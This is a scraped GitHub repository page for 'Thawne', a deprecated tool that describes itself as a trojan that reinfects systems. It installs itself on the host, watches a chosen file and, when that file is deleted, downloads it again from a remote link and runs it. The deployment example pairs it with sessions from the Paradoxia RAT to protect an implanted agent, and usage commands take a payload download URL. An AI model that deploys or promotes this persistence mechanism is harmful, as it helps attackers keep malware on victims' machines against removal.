quantumcore / thawne

Thawne is a Sentinel for your Program. A trojan that Reinfects systems. It installs itself on the system it's Executed on. After which Thawne keeps checking if your File Exists on the System and is Running. If it's not running then Start it, If it does not exist or is removed Reinstall it.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

NOTE : This is deprecated. Please do not expect any updates.

Thawne

Thawne is a Sentinel for your Program. A trojan that Reinfects systems. It installs itself on the system it's Executed on. After which Thawne keeps checking if your File Exists on the System and is Running. If it's not running then Start it, If it does not exist or is removed Reinstall it.

Example

thawne

Deployment (Example)

After getting a Session in Paradoxia, You can see Bot information and in it, The Agent Location, Which is in this case the file I want to be guarded.

img

We can use thawne with the Agent Location and it's absolute filename.

./thawne http://www.myfileserver/file_to_replace.exe < Absolute Filename > < PATH > 

and then Upload the file and Execute it.

USAGE

$ cd Thawne
$ ./thawne < direct file download link > < filename to watch > < file path to watch >

About

Thawne is a Sentinel for your Program. A trojan that Reinfects systems. It installs itself on the system it's Executed on. After which Thawne keeps checking if your File Exists on the System and is Running. If it's not running then Start it, If it does not exist or is removed Reinstall it.

License:MIT License


Languages

Language:C 51.9%Language:Python 45.2%Language:Makefile 3.0%